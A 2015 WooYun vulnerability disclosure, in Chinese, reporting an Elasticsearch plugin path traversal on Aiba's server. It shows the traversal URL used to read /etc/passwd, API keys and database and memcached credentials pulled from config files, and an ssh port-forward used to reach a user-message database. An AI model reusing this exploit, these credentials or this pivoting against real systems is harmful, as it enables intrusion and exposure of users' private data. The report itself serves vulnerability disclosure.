当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145240

漏洞标题:爱吧某处配置不当导致部分数据库沦陷(涉及300多万用户信息)

相关厂商:爱吧

漏洞作者: 1c3z

提交时间:2015-10-07 23:02

修复时间:2015-11-21 23:32

公开时间:2015-11-21 23:32

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-07: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向核心白帽子及相关领域专家公开
2015-10-27: 细节向普通白帽子公开
2015-11-06: 细节向实习白帽子公开
2015-11-21: 细节向公众公开

简要描述:

好多妹子呀。。

详细说明:

elasticsearch 任意文件读取 ,可读shadow
http://www.aiba.com:9200/_plugin/bigdesk/../../../../../../etc/passwd (不能用浏览器访问)

选区_302.png


找啊找啊
/home/stan/.bash_history 发现nginx配置文件 /usr/local/nginx/conf/nginx.conf
web目录就出来了 /home/www/web
继续找啊找啊
极光推送
$appkeys = 'b4cd89a03e6141d2e1bb3cc2';
$masterSecret = '2ad5449f59ec23c6ed1ffc3d';
$url = 'http://api.jpush.cn:8800/sendmsg/v2/sendmsg';
短信猫
http://sdk2.zucp.net:8060/webservice.asmx/mt
"sn" => "SDK-BBX-010-17092",
"pwd" => "18FDBF89EB1E524561DFE5990391E7DF",
百度云
var $baiduyun_apiKey = "mxOXDGBuIXueqoHQ0quB2rfl";
var $baiduyun_secretKey = "BqomKjBHwL6ZGDgcwGwpOjZu96NsuA4g";
七牛
define('QINIU_AUTH_IMAGE_DOMAIN', 'http://7lry8m.com1.z0.glb.clouddn.com');
define('QINIU_IMAGE_AK', 'O6CdPaToCBcrmE5tZsz7HK8Ck4qia7XwNTFQ0ELK');
define('QINIU_IMAGE_SK', 'rv5TBbZTNeQBUNzGa_2k3yBoV6kTuZuTW6ihhT5W');
/home/www/web/data/config.inc.php
一堆数据库配置文件
define('DB_HOST', 'rdsmzjjm2uyizv3.mysql.rds.aliyuncs.com');
define('DB_USER', 'ctt');
define('DB_PW', 'qq007sh');
define('DB_NAME', 'ctt');
define('XMPP_DB_HOST', 'rds481ct9p5enlt2333a.mysql.rds.aliyuncs.com');
define('XMPP_DB_USER', 'aiba');
define('XMPP_DB_PW', 'b2qgde4btl');
define('XMPP_DB_NAME', 'ejabberd');
define('TRACE_DB_HOST', '10.160.51.60');
define('TRACE_DB_USER', 'api_call');
define('TRACE_DB_PW', '3a9e@we443#bb');
define('TRACE_DB_NAME', 'api_log');
$this->memcached->addServer('366941faf1e411e3.m.cnhzalicm10pub001.ocs.aliyuncs.com', 11211);
$this->memcached->setSaslAuthData('366941faf1e411e3', '06f5_50f6');
妈蛋主从数据库都连接不上。
memcached可以telnet 11211
XMPP_DB_HOST', 'rds481ct9p5enlt2333a.mysql.rds.aliyuncs.com 可以连接
本地连接,
ssh端口转发,ip为阿里云主机:
ssh -L 192.168.66.1:3307:rds481ct9p5enlt2333a.mysql.rds.aliyuncs.com:3306 root@ip

漏洞证明:

来自XMPP_DB_HOST
好多用户呀

选区_297.png


可以看到用户消息

选区_301.png


图片

选区_300.png


修复方案:

elasticsearch 升级
改密码吧。。

版权声明:转载请注明来源 1c3z@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-07 23:31

厂商回复:

最近在添加服务器日志造成的漏洞

最新状态:

2015-10-15:漏洞由日志服务elasticsearch的低版本造成,已经更新到最新版本,并且更新所有密码

2015-10-15:另外,XMPP Database里面只有IM需要的相关数据,没有用户实际资料